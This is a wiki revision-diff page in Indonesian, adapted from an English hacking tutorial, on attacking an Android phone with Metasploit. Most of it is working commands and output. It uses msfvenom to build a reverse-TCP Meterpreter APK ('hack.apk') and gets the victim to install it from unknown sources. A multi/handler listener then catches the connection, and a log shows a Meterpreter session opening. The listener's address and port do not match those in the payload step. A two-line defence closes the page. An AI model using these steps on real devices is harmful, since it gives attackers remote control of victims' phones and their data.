Difference between revisions of "MSF: meterpreter untuk attack android"
Onnowpurbo (talk | contribs) (Created page with "sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs Nowadays mobile users are increasing day b...") |
Onnowpurbo (talk | contribs) |
||
(5 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs | sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs | ||
− | |||
− | + | ==Apakah Android?== | |
− | + | Android adalah sistem operasi berbasis kernel Linux, dan dirancang terutama untuk perangkat mobile touchscreen seperti smartphone dan komputer tablet. Awalnya dikembangkan oleh Android, Inc., yang didukung Google secara finansial dan kemudian dibeli pada tahun 2005, Android diresmikan pada tahun 2007 bersamaan dengan berdirinya Open Handset Alliance: sebuah konsorsium perangkat keras, perangkat lunak, dan perusahaan telekomunikasi yang ditujukan untuk meningkatkan standar terbuka untuk seluler. | |
− | + | ==Apakah APK?== | |
− | + | File paket aplikasi Android (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi dan middleware ke sistem operasi Google Android; Sangat mirip dengan paket MSI di Windows atau paket Deb pada sistem operasi berbasis Debian seperti Ubuntu. | |
− | + | ==Skenario Serangan== | |
− | Attacker IP address: 192.168. | + | * Attacker IP address: 192.168.0.104 |
+ | * Attacker port to receive connection: 4895 | ||
− | + | ==Kebutuhan== | |
− | + | * Metasploit framework (menggunakan Kali Linux 2016.2) | |
+ | * Android smartphone | ||
− | + | ==Membuat exploit== | |
− | + | * Di CLI Kali Linux, ketik | |
− | + | msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> > hack.apk | |
+ | msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 > hack.apk | ||
− | |||
− | + | Akan keluar kira-kira | |
− | + | No platform was selected, choosing Msf::Module::Platform::Android from the payload | |
+ | No Arch selected, selecting Arch: dalvik from the payload | ||
+ | No encoder or badchars specified, outputting raw payload | ||
+ | Payload size: 8784 bytes | ||
− | |||
− | + | ==Download apk di SmartPhone== | |
− | + | * Download apk | |
+ | * Setting, contreng Install from "unknown source". | ||
+ | * Install & jalankan apk tersebut di smartphone. | ||
− | + | ==Setelah .apk di jalankan== | |
− | + | * Di CLI Kali Linux | |
− | + | msfconsole | |
− | + | * Jalankan exploit | |
− | + | use exploit/multi/handler | |
+ | set payload android/meterpreter/reverse_tcp | ||
+ | set lhost 192.168.0.209 | ||
+ | set lport 443 | ||
+ | exploit | ||
− | + | Akan keluar | |
− | + | [*] Started reverse TCP handler on 192.168.0.209:443 | |
+ | [*] Starting the payload handler... | ||
− | + | Jika ada sambungan dari smartphone, | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
+ | [*] Sending stage (67614 bytes) to 192.168.0.157 | ||
+ | [*] Meterpreter session 1 opened (192.168.0.209:443 -> 192.168.0.157:35391) at 2017-06-01 05:44:49 +0700 | ||
+ | |||
+ | meterpreter > | ||
+ | ==Solusi== | ||
+ | * Jangan install APK dari "unknown source" | ||
+ | * Kalau terpaksa juga, pastikan apk tersebut bersih. | ||
Latest revision as of 12:24, 1 June 2017
Apakah Android?
Android adalah sistem operasi berbasis kernel Linux, dan dirancang terutama untuk perangkat mobile touchscreen seperti smartphone dan komputer tablet. Awalnya dikembangkan oleh Android, Inc., yang didukung Google secara finansial dan kemudian dibeli pada tahun 2005, Android diresmikan pada tahun 2007 bersamaan dengan berdirinya Open Handset Alliance: sebuah konsorsium perangkat keras, perangkat lunak, dan perusahaan telekomunikasi yang ditujukan untuk meningkatkan standar terbuka untuk seluler.
Apakah APK?
File paket aplikasi Android (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi dan middleware ke sistem operasi Google Android; Sangat mirip dengan paket MSI di Windows atau paket Deb pada sistem operasi berbasis Debian seperti Ubuntu.
Skenario Serangan
- Attacker IP address: 192.168.0.104
- Attacker port to receive connection: 4895
Kebutuhan
- Metasploit framework (menggunakan Kali Linux 2016.2)
- Android smartphone
Membuat exploit
- Di CLI Kali Linux, ketik
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> > hack.apk msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 > hack.apk
Akan keluar kira-kira
No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8784 bytes
Download apk di SmartPhone
- Download apk
- Setting, contreng Install from "unknown source".
- Install & jalankan apk tersebut di smartphone.
Setelah .apk di jalankan
- Di CLI Kali Linux
msfconsole
- Jalankan exploit
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.209 set lport 443 exploit
Akan keluar
[*] Started reverse TCP handler on 192.168.0.209:443 [*] Starting the payload handler...
Jika ada sambungan dari smartphone,
[*] Sending stage (67614 bytes) to 192.168.0.157 [*] Meterpreter session 1 opened (192.168.0.209:443 -> 192.168.0.157:35391) at 2017-06-01 05:44:49 +0700 meterpreter >
Solusi
- Jangan install APK dari "unknown source"
- Kalau terpaksa juga, pastikan apk tersebut bersih.